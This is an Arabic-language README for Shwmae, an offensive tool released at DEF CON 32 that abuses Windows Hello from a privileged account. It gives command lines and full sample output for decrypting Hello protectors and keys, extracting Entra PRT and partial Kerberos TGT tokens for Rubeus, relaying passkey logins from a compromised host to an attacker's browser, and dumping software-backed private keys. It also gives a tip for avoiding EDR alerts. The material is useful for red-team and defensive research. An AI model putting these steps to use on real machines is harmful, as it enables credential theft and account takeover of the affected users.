
يستغل Windows Hello من سياق مميز لتعداد الحماة، وفك تشفير المفاتيح، واستخراج رموز PRT/TGT، وتحويل طلبات WebAuthn، وتفريغ المفاتيح الخاصة المدعومة بالبرمجيات.
شوماي (شو-ماي) هي أداة إساءة استخدام لـ Windows Hello تم إصدارها خلال DEF CON 32 كجزء من محاضرة "إساءة استخدام Windows Hello بدون يد مقطوعة". الغرض من الأداة هو إساءة استخدام Windows Hello من سياق مستخدم متميز.
Shwmae
حقوق الطبع والنشر (C) 2024 Shwmae
enum (الافتراضي) تعداد حماة Windows Hello والمفاتيح والمُعتمَدات
sign توقيع بيانات باستخدام شهادة محمية بـ Windows Hello
prt الحصول على PRT لـ Entra و TGT جزئي قابل للاستخدام مع Rubeus
webauthn إنشاء خادم ويب لتوكيل طلبات WebAuthn من جهاز مهاجم
dump تفريغ المفاتيح المحمية بـ Windows Hello المدعومة ببرمجيات
help عرض مزيد من المعلومات حول أمر معين.
version عرض معلومات الإصدار.
الأداة تحتوي على عدة أوضاع تشغيل.
عند عدم تقديم وسائط، يكون التعداد هو الوضع الافتراضي، أو يمكنك استخدام الأمر enum. وضع التعداد سيقوم بتعداد جميع حاويات Windows Hello المتاحة، وتعداد جميع المفاتيح والحماة المسجلة في Windows Hello داخل الحاوية بشكل متكرر. في الحالات التي لا يوجد فيها TPM على المضيف، يتم إنشاء تجزئة (hash) لحامي PIN يمكن كسرها دون اتصال باستخدام hashcat.
سيتم فك تشفير الحامي البيومتري تلقائياً ولكن يمكن فك تشفير حامي PIN وحامي الاسترداد باستخدام الوسيطات /pin و /token على التوالي. يلزم فك تشفير حامي واحد فقط من كل حاوية للسماح بإساءة استخدام مفاتيح Windows Hello داخل تلك الحاوية.
Shwmae
[+] تم فك تشفير مفتاح نهج الخزنة SYSTEM 4bf4c442-9b8a-41a0-b380-dd4a704ddb28: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] تم فك تشفير نهج الخزنة:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
GINGE\mary.gruber (S-1-5-21-1003644063-402998240-3342588708-1111)
Provider : Microsoft Platform Crypto Provider
مفتاح استرداد محمي: eyJWZXJzaW9uIjoxLCJQcm90ZWN0ZW...
مفتاح الاسترداد : استخدم الوسيطة /token لفك تشفير مفتاح الاسترداد
** الحماة **
النوع : Pin
نوع PIN : Numeric
الطول : 8
تم فك التشفير : قدم الوسيطة /pin لمحاولة فك التشفير
النوع : Bio
نوع التشفير : Aes
GCM Nonce : cacf46896844d3f96a55fd8c
GCM AuthData : 01000000200000000c000000b400000010000000cacf46896844d3f96a55fd8c
GCM Tag : f5d6d1c3e35f944038e03013851d6d69
تم فك التشفير : True (مفتاح Bio صحيح)
ExtPin : 0f28b81e36b0446cf0deb9ca680c05aeb7b7129ab830936fce3836bbd520ee94
DecryptPin : c63e6e0c199cedff0a086277894f85f510305cef6d4c6ac7efc21bb122f537b1
SignPin : 855b2d32d62a4dafb50d47838d4ce13f8d7d6871718e384d6db22b407ecb05a3
النوع : Recovery
IV : 49b2c5b8416e5563387e10a8a3d9ae68
** المُعتمَدات **
المورد : WinBio Key Resource
SID : S-1-5-21-1003644063-402998240-3342588708-1111
مفتاح الحامي : 59e87b8c63973fb3bfd322016a61e33b59a569c22f9aad22d4c91b6db75bcf52
** المفاتيح **
الاسم : login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/[email protected]
المزود : Microsoft Platform Crypto Provider
معرف المفتاح : {B8EF94E6-23EE-42D3-B8DB-BC0AC5EF1824}
ملف المفتاح : 1d3ddd8ac0d04ae299673cd1ffb19b90cc2e277d.PCPKEY
معرف مستأجر Azure: de60a4fa-d583-4eb0-ab66-ce358af8279c
مستخدم Azure : [email protected]
Azure kid : l5Ov1EluHGcTl/MCwWooU71x0+sHBs78M1Ts9szdNEw=
الاسم : FIDO_AUTHENTICATOR//3aeb002460381c6f258e8395d3026f571f0d9a76488dcd837639b13aed316560_fda42d8889ba587fc7fa202a2e6d91ffad4642abb9c2bd75ea9f906be188925126bdf07d591267672cc2fa79b0750de2437b1d77d6f924af1b4992f4e3527bb0
المزود : Microsoft Platform Crypto Provider
معرف المفتاح : {36E18DBB-52AC-4198-BD34-55B3490A575C}
ملف المفتاح : 979dffb30e1a28d7d6c6c1a5e55c383db8d04dbd.PCPKEY
طرف الاعتماد FIDO : github.com
المفتاح العام FIDO : RUNTMSAAAADkOpq228W7gXH3VTLeCwScNAyJHFmchJjCZass71QHqCyStIrQWry6m-5XK8HTAdU31UXmkuEI6fjdSmGOtWGR
معرف اعتماد FIDO : qhdzMrPMlH-Fg_sdpNiKhuVpnSd__p1vDN41O3Ip3co
معرف مستخدم FIDO : _aQtiIm6WH_H-iAqLm2R_61GQqu5wr116q-Qa-GIklEmvfB9WRJnZyzC-nmwdQ3iQ3sdd9b5JK8bSZL041J7sA
مستخدم FIDO : mary-gruber
الاسم المعروض FIDO: mary-gruber
عدد التوقيعات FIDO : 2
الاسم : //9DDC52DB-DC02-4A8C-B892-38DEF4FA748F (مفتاح الخزنة)
المزود : Microsoft Software Key Storage Provider
معرف المفتاح : {7418B315-A00B-4113-A0EC-5C51718D11C5}
ملف المفتاح : fc65330b205c133f00d035ea9e8dfba6_2a155d6c-838c-43f5-b943-b21cc30532d7
الاسم : //CA00CFA8-EB0F-42BA-A707-A3A43CDA5BD9
المزود : Microsoft Software Key Storage Provider
معرف المفتاح : {696644C4-EA34-400C-99D2-8B5E38095AA6}
ملف المفتاح : c4b537d879e21b5d6f797517912be27b_2a155d6c-838c-43f5-b943-b21cc30532d7
وضع تشغيل PRT يسهل إنشاء PRT أولي وتجديد PRT موجودة عبر الأمر prt باستخدام أي مفاتيح Windows Hello مسجلة في Entra. إذا كان trust cloud ممكناً في المستأجر، يتم فك تشفير TGT السحابي ويمكن استخدامه للمصادقة كمستخدم ضد Active Directory المحلي باستخدام Rubeus.
Shwmae prt --sid S-1-5-21-1003644063-402998240-3342588708-1111
[+] تم فك تشفير مفتاح نهج الخزنة SYSTEM 4bf4c442-9b8a-41a0-b380-dd4a704ddb28: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] تم فك تشفير نهج الخزنة:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
[=] تم العثور على مفتاح Azure بـ UPN [email protected] و kid l5Ov1EluHGcTl/MCwWooU71x0+sHBs78M1Ts9szdNEw=
[+] تم فك تشفير مجموعة مفاتيح NGC بنجاح من نوع الحامي Bio
مفتاح النقل : SK-4eed430d-3568-3005-69ca-6967fac4ba9c
PRT : 0.AS8A-qRg3oPVsE6rZs41ivgnnIc7qjhtoBdIsnV6MWmI2TsvABc.AgABAwEAAAA....xDuWvx
مفتاح جلسة PRT : AQCeykYwMRUg0d.....uOteU9zR8tCw
سياق PRT العشوائي: 71f7b1a2f4a53a55f39254d3970727104b4d6557040e2b8f
مفتاح PRT المشتق: 8314d5d03cfcda825edd2f145083504ccef698beb3beff78658240e96158fee0
TGT جزئي : doIGEjCCBg6gAwIBBaEDAgEWooIE4TC...TZaowUCAwwWuw==
لتجديد PRT، يلزم PRT ومفتاح الجلسة من طلب PRT الأولي.
[+] تم فك تشفير مفتاح نهج الخزنة SYSTEM 4bf4c442-9b8a-41a0-b380-dd4a704ddb28: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] تم فك تشفير نهج الخزنة:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
مفتاح النقل : SK-4eed430d-3568-3005-69ca-6967fac4ba9c
PRT : 0.AS8A-qRg3oPVsE6rZs41ivgnnIc7qjhtoBdIsnV6MWmI2TsvABc.AgABAwEAAAA....xDuWvx
مفتاح جلسة PRT : AQCeykYwMRUg0d.....uOteU9zR8tCw
سياق PRT العشوائي: 71f7b1a2f4a53a55f39254d3970727104b4d6557040e2b8f
مفتاح PRT المشتق: 8314d5d03cfcda825edd2f145083504ccef698beb3beff78658240e96158fee0
TGT جزئي : doIGEjCCBg6gAwIBBaEDAgEWooIE4TC...TZaowUCAwwWuw==
وضع تشغيل WebAuthn ينشئ واجهة ويب بسيطة عبر الأمر webauthn تقبل طلبات تأكيد WebAuthn من إضافة متصفح ShwmaeExt من مضيف آخر.
بمجرد إعداد مستمع HTTP لـ WebAuthn على مضيف مخترق (الذي يستمع افتراضيًا على المنفذ 8000)، يمكنك تثبيت ShwmaeExt في متصفح مهاجم. بمجرد تعيين عنوان URL للمستمع داخل الإضافة، يمكنك تسجيل الدخول عبر مصادقة Passkey باستخدام أي معتمدات متاحة من المضيف المخترق. يمكنك العثور على الإضافة المفككة داخل مجلد ShwmaeExt.
[+] تم فك تشفير مفتاح نهج الخزنة SYSTEM 4bf4c442-9b8a-41a0-b380-dd4a704ddb28: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] تم فك تشفير نهج الخزنة:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
[=] وكيل WebAuthn قيد التشغيل، اضغط Enter للخروج
يمكن استخدام الأمر dump لاستخراج المفاتيح الخاصة المدعومة بـ Windows Hello والتي تكون مدعومة بمزود تخزين المفاتيح البرمجي (Software Key Storage Provider). لا يمكنك استخدام هذا الوضع لاستخراج المفاتيح المدعومة بمزود تخزين المفاتيح الأساسي (Platform Key Storage Provider).
Shwmae.exe dump --key-name login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/[email protected]
يمكن استخدام الأمر sign لتوقيع بيانات عشوائية بمفتاح محدد. يمكن أن يكون هذا الوضع مفيدًا في السيناريوهات التي لا يوجد فيها تكامل محدد داخل الأداة.
يتم استخدام الوسيطة --key-name لاستهداف زوج المفاتيح المحدد لـ Windows Hello، والوسيطة --data لحساب التوقيع. يجب تقديم البيانات كسلسلة مشفرة بـ Base64، ولكن يتم فك تشفير السلسلة أولاً إلى ثنائي قبل توليد التوقيع. يتم تحويل التوقيع الثنائي إلى Base64 وطباعته على وحدة التحكم.
Shwmae.exe sign --key-name login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/[email protected] --data AAAAAA
[+] تم فك تشفير مفتاح نهج الخزنة SYSTEM 4bf4c442-9b8a-41a0-b380-dd4a704ddb28: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] تم فك تشفير نهج الخزنة:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
[=] تم العثور على مفتاح في الحاوية 1f75e567-63ab-4f90-b1f6-cfc30b399085 للمستخدم GINGE\mary.gruber (S-1-5-21-1003644063-402998240-3342588708-1111)
[+] تم فك تشفير مجموعة مفاتيح NGC بنجاح من نوع الحامي Bio
[+] نجاح:
MogfSZKrtYs9kfy0jPrVODpu4/eJfXHvGu+TQJzf9JG9JMug2+rmG7zEBuzUunMVy7jyHSBwv1eQ78yQr/G5y0VfoeKYnW5UbKuO9ZnImTuIFem4RE7RhQ84Pm4BgEQ3W16ebcf5CIHnIOZpOec6nbh7WZBIi2AG8N5fWK9itWA1Uk7j1TAFO7gCfAbrE9O6KiMLe4AAdw2vjR5s9RVqw1MdacWKOBDwGVm+VmHY6kYXSCovyWJ+ESoi75fRfRSgyPcHViNOP77pnUDOeMfl9nsE6C0UEKSCvJ+GGJy3u5uiK5fC1w73TG8s/Y2O6YSJpjnXqC5ZJhrE/vLtJNtGWg==
قد تنبه بعض EDR عند تفريغ مفاتيح DPAPI عبر قراءة أسرار LSA. إذا حصلت على مفاتيح DPAPI لحساب SYSTEM بطرق أخرى، يمكن إدخالها عبر مفتاحي --system-dpapi و --machine-dpapi على التوالي باستخدام سلسلة سداسية عشرية تمثل مفتاحًا بحجم 16 بايت (32 حرفًا).